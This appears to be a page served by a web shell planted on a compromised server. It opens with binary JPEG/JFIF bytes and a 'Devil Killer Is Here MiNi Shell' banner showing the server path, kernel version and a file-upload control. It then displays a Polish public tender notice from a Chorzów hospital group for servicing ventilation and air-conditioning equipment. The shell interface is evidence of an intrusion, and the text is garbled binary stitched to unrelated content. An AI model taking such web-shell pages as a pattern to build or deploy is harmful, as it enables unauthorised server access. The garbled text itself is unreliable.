JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250417/0019648001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa serwisowa i przegląd wentylacji i klimatyzacji wraz z wymianą elementów zużywalnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SAMODZIELNY PUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ ZESPÓŁ SZPITALI MIEJSKICH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 271503410</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Strzelców Bytomskich 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chorzów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">032 34-99-268</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">032 34-99-299</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@zsm.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.zsm.com.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa serwisowa i przegląd wentylacji i klimatyzacji wraz z wymianą elementów zużywalnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bcd711bb-218d-4775-a988-25c498f7ee74</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00196480</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zsm-chorzow.ezamawiajacy.pl/pn/zsm-chorzow/demand/205378/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zsm-chorzow.ezamawiajacy.pl/pn/zsm-chorzow/demand/205378/notice/public/details</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">a)	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej tj. Platformy zakupowej: https://zsm-chorzow.ezamawiajacy.pl. Ilekroć w dalszej części SWZ jest mowa o: „Platformie zakupowej” – należy przez to rozumieć narzędzie umożliwiające realizację procesu związanego z udzielaniem zamówień publicznych w formie elektronicznej lub postaci elektronicznej podpisanej podpisem zaufanym lub osobistym, służące w szczególności do przekazywania ofert, oświadczeń zwane dalej „Platformą” lub „eZamawiający”. Informacje dotyczące odpowiedniego przygotowania stanowiska Wykonawcy znajdą na stronie: https://oneplace.marketplanet.pl/przygotuj-stanowisko-pc-wykonujac-ponizsze-kroki<br/>b)	zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Zespołu Szpitali Miejskich w Chorzowie; https://zsm-chorzow.ezamawiajacy.pl lub https://oneplace.marketplanet.pl.<br/>c)	Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. <br/>d)	Rejestracja konta następuje poprzez: kontakt z numerem telefonu podanym w potwierdzeniu lub jeżeli użytkownik nie skontaktuje się telefonicznie konto zostanie aktywowane w ciągu maksymalnie 6 godzin roboczych.<br/>e)	Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia, informacje oraz dokumenty przekazywane są w formie elektronicznej lub postaci elektronicznej podpisanej podpisem zaufanym lub osobistym, za pośrednictwem Platformy Zakupowej. Za datę przekazania zaświadczeń, informacji oraz dokumentów przyjmuje się datę ich wysłania za pośrednictwem zakładki „Korespondencja”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny wynikający z art. 13 RODO w przypadku zbierania danych osobowych bezpośrednio od osoby fizycznej, której dane dotyczą, w celu związanym z postępowaniem o udzielenie zamówienia publicznego – Klauzula informacyjna dotycząca Zamawiającego została zamieszczona na ostatniej stronie specyfikacji warunków zamówienia (dalej w treści: SWZ). Natomiast, klauzula informacyjna dotycząca Wykonawcy ujęta jest w załączniku nr 1 do SWZ – „Formularz ofertowy”. Wykonawca zobowiązany jest zapoznać wszystkich pracowników z klauzulą dot. powierzenia danych osobowych, a których dane zostaną przekazane Zamawiającemu w trakcie i po rozstrzygnięciu postępowania. RODO - Rozporządzenie Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04 maja 2016, str. 1-88).</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO; nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSM/ZP/19/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są usługi w zakresie przeglądu (konserwacji), usuwania awarii i usterek (pogotowie serwisowe) oraz utrzymania w pełnej sprawności technicznej urządzeń klimatyzacyjnych oraz urządzeń wentylacyjnych i nawilżaczy powietrza, w tym dostawa części zamiennych i materiałów eksploatacyjnych. Usługa serwisowa realizowana będzie w jednostce przy ul. Strzelców Bytomskich 11 oraz w jednostce przy ul. Władysława Truchana 7 w Chorzowie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50730000-1 - Usługi w zakresie napraw i konserwacji układów chłodzących</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71315410-6 - Kontrola systemu wentylacji</p> <p class="mb-0">50530000-9 - Usługi w zakresie napraw i konserwacji maszyn</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">13.1.	Przy wyborze i ocenie oferty Zamawiający będzie się kierować wyłącznie następującymi kryteriami dla każdej części:<br/>1)	Kryterium cena oferty - 60%<br/>2)	Kryterium gwarancja - 40%<br/><br/>a)	Kryterium cena oferty (Pc):<br/>Ocena kryterium zostanie obliczona wg wzoru:<br/>(Cn / Cb) x 60 = Pc<br/>gdzie:<br/>Pc - punkty otrzymane za cenę <br/>Cn - cena najniższej oferty<br/>Cb - cena badanej oferty<br/>Oferta w tym kryterium może otrzymać maksymalnie 60 punktów, pozostałe oferty proporcjonalnie mniej.<br/><br/>b)	Kryterium gwarancja (Pg):<br/>Oferta w tym kryterium może otrzymać maksymalnie 40 punktów- 20 punktów zgodnie z ppkt 1 poniżej i 20 punktów zgodnie z ppkt 2 poniżej.<br/>Liczba otrzymanych punktów w ramach kryterium gwarancja (Pg) wyrażona będzie jako suma dwóch punktacji: gwarancja na wykonaną usługę (Gu) oraz gwarancja na zastosowane nowe części (Gcz)<br/><br/>Pg = Gu + Gcz<br/><br/>1.	Gwarancja na wykonaną usługę (Gu)<br/>Wykonawca w formularzu ofertowym deklaruje na ile miesięcy udziela gwarancji na wykonaną usługę. Liczba przyznawanych punktów w zależności od zadeklarowanej ilości miesięcy wynosi:<br/>Lp.	Termin gwarancji	Liczba punktów (Gu)<br/>1	6 miesięcy	0 pkt<br/>2	12 miesięcy	10 pkt<br/>3	18 miesięcy	20 pkt<br/><br/>Oferta w tym kryterium może otrzymać maksymalnie 20 punktów, pozostałe oferty zgodnie z powyższą tabelą. Minimalny okres gwarancji wynosi 6 miesięcy. Za zaoferowanie 6 miesięcznego okresu gwarancji Wykonawca otrzyma 0 punktów.<br/>Zamawiający zastrzega, że Wykonawca zobowiązany jest do podania terminu gwarancji w miesiącach. W przypadku gdy, Wykonawca nie zadeklaruje żadnego okresu gwarancji Zamawiający przyjmie najkrótszy okres gwarancji wynoszący 6 miesięcy. <br/>W przypadku gdy Wykonawca zadeklaruje w ofercie udzielenie gwarancji dłuższej niż 18 miesięcy Zamawiający przyzna takiej ofercie maksymalną ilość punktów, natomiast umowa zostanie zawarta zgodnie z terminem podanym w ofercie. W sytuacji gdy Wykonawca poda okres gwarancji krótszy niż 6 miesięcy, Zamawiający odrzuci ofertę jako niezgodną z SWZ na podstawie art. 226 ust. 1 pkt 5 ustawy Prawo zamówień publicznych.<br/><br/>2.	Gwarancja na zastosowane nowe części (Gcz)<br/>Wykonawca zobowiązany jest do udzielenia 12 miesięcznej gwarancji na nowe części. W przypadku wydłużenia okresu gwarancji o dodatkowe miesiące Wykonawca otrzyma następujące punkty: w formularzu ofertowym deklaruje na ile miesięcy udziela gwarancji na zastosowane nowe części:<br/>Lp.	Termin gwarancji	Liczba punktów (Gcz)<br/>1	Gwarancja producenta 12 miesięcy	0 pkt<br/>2	Wydłużenie gwarancji o 3 miesiące 10 pkt<br/>3	Wydłużenie gwarancji o 6 miesięcy	20 pkt<br/><br/>Minimalny okres gwarancji to gwarancja określona przez producenta części, maksymalny okres gwarancji to wydłużenie o 3 lub 6 miesięcy gwarancji określonej przez producenta części. Za zaoferowanie okresu gwarancji wskazanego przez producenta Wykonawca otrzyma 0 punktów. <br/>Zamawiający zastrzega, że Wykonawca zobowiązany jest do podania terminu gwarancji w miesiącach. W przypadku gdy, Wykonawca nie zadeklaruje żadnego okresu gwarancji Zamawiający przyjmie najkrótszy okres gwarancji tj. 12 miesięcy. W przypadku gdy Wykonawca zadeklaruje w ofercie wydłużenie gwarancji dłuższej niż 6 miesięcy Zamawiający przyzna takiej ofercie maksymalną ilość punktów natomiast umowa zostanie zawarta zgodnie z terminem podanym w ofercie. <br/><br/>Ciąg dalszy w pkt 13 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	zdolności do występowania w obrocie gospodarczym – Zamawiający nie ustanawia warunku. <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie ustanawia warunku.<br/>3)	sytuacji ekonomicznej lub finansowej – Zamawiający nie ustanawia warunku. <br/>4)	zdolności technicznej lub zawodowej – warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że: <br/>a)	w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał co najmniej jedną usługę serwisową trwającą dłużej niż 6 miesięcy, polegającą na świadczeniu usługi konserwacji, serwisowania i usuwania awarii central wentylacyjnych, agregatów wody lodowej i agregatów freonowych. <br/>b)	w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał co najmniej jedną usługę serwisową trwającą dłużej niż 6 miesięcy polegającą na bieżącej naprawie urządzeń (wszystkich) gdzie czas reakcji na zgłoszenie awarii mieścił się w przedziale czasowym od 60 minut do 120 minut – pogotowie serwisowe 24h przez 7 dni w tygodniu. Przez czas reakcji Zamawiający rozumie rozpoczęcia interwencji (podjęcie czynności kontrolnych) od 60 minut do 120 minut od chwili zgłoszenia tej awarii przez Zamawiającego. Zamawiający dopuszcza sumowanie doświadczenia w ramach realizacji jednego kontraktu lub/i dwóch kontraktów (umów). W przypadku konsorcjum Zamawiający dopuszcza sumowanie potencjału w ramach doświadczenia konsorcjum przy czym członek konsorcjum wykazujący dane doświadczenie będzie zobowiązany wykonać te usługi w trakcie realizacji umowy. <br/>c)	Dysponuje zapleczem technicznym wystarczającym do wykonania zadania w sposób zapewniający sprawne i bezpieczne działanie urządzenia, dysponuje częściami zamiennymi (nowymi, dedykowanymi przez producenta - o parametrach nieodbiegających od nowych oryginalnych, dedykowanych przez producenta części zamiennych), dysponuje częściami zużywalnymi i materiałami eksploatacyjnymi nowymi, dedykowanymi przez producenta lub równoważnymi – o parametrach nieodbiegających od nowych oryginalnych, dedykowanych przez producenta części zużywalnych i materiałów eksploatacyjnych, posiada określone przez wytwórcę instrukcje serwisowe wyrobu, pozwalające na wykonanie przedmiotu zamówienia w sposób zapewniający sprawne i bezpieczne działanie urządzenia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	Wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie: co najmniej 1 usługę polegającą na świadczeniu usługi konserwacji, serwisowania i usuwania awarii central wentylacyjnych, agregatów wody lodowej i agregatów freonowych, wraz z podaniem rodzaju (zakresu), dat wykonania oraz podmiotów, na rzecz których usługa ta została wykonana oraz - w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał co najmniej jedną usługę serwisową trwającą dłużej niż 6 miesięcy polegającą na bieżącej naprawie urządzeń (wszystkich) – pogotowie serwisowe 24h przez 7 dni w tygodniu, oraz z załączeniem dowodów określających, czy ta usługa została wykonana należycie przy czym dowodami o których mowa, są: <br/>a)	Referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługa była wykonywana, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Wyjaśnienie - dowodami o których mowa powyżej, są: <br/>	Poświadczenia, z których wynika, iż zamówienie zrealizowano efektywnie z rzetelnością lub w sposób potwierdzający kwalifikacje i doświadczenie Wykonawcy lub, <br/>	Oświadczenie, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze nie jest on w stanie uzyskać poświadczenia, o którym mowa powyżej. <br/>b)	W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego została wykonana usługa wskazane w wykazie (Załącznik nr 8 do SWZ), Wykonawca nie ma obowiązku przedkładania powyższych dowodów. W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>2)	Oświadczenie Wykonawcy, iż dysponuje zapleczem technicznym wystarczającym do wykonania zadania w sposób zapewniający sprawne i bezpieczne działanie urządzenia, dysponuje częściami zamiennymi (nowymi, dopuszczonymi przez producenta lub równoważnymi – o parametrach nieodbiegających od nowych oryginalnych, dopuszczonymi przez producenta części zamiennych), dysponuje częściami zużywalnymi i materiałami eksploatacyjnymi (nowymi, dopuszczonymi przez producenta lub równoważnymi – o parametrach nieodbiegających od nowych oryginalnych, dopuszczonymi przez producenta części zużywalnych i materiałów eksploatacyjnych), posiada określone przez wytwórcę instrukcje serwisowe wyrobu, pozwalające na wykonanie zadania w sposób zapewniający sprawne i bezpieczne działanie urządzenia zgodnie z załącznikiem nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a)	Wypełniony Formularz Ofertowy wg załącznika nr 1 do SWZ. Dla Zamawiającego wiążący jest wyłącznie Formularz Ofertowy (Załącznik nr 1 do SWZ). Niniejszy Formularz nie podlega uzupełnieniu na zasadach regulowanych przepisami art. 128 ust. 1 UPZP. Wykonawca wypełnia również informacyjnie formularz systemowy (tj. wartości brutto) na Platformie https://zsm-chorzow.ezamawiajacy.pl/. Wykonawca, składając ofertę informuje Zamawiającego, czy wybór oferty będzie prowadzić do powstania u Zamawiającego obowiązku podatkowego – Formularz ofertowy, pkt. 2 załącznika nr 1 do SWZ (OPIS SPOSOBU OBLICZANIA CENY pkt 12 ppkt. 12.7 SWZ).<br/>b)	Dokumenty i oświadczenia wymienione w pkt. 5 SWZ przy których umieszczono dopisek: „dołączyć do oferty”.<br/>c)	Aktualne na dzień składania ofert oświadczenie o braku podstaw wykluczenia – załącznik nr 6 do SWZ – dołączyć do oferty w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem osobistym lub podpisem zaufanym.<br/>d)	Aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu – załącznik nr 7 do SWZ – dołączyć do oferty w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem osobistym lub podpisem zaufanym.<br/>e)	Pełnomocnictwo lub inne dokumenty, z których wynika prawo do podpisania dokumentów składanych wraz z ofertą – jeżeli dotyczy.<br/>f)	Zobowiązanie Podmiotu/Podmiotów oddających do dyspozycji Wykonawcy niezbędne zasoby – dołączyć do oferty – załącznik nr 10 do SWZ (jeśli dotyczy).<br/>g)	Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia składane na podstawie art. 117 ust. 4 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - 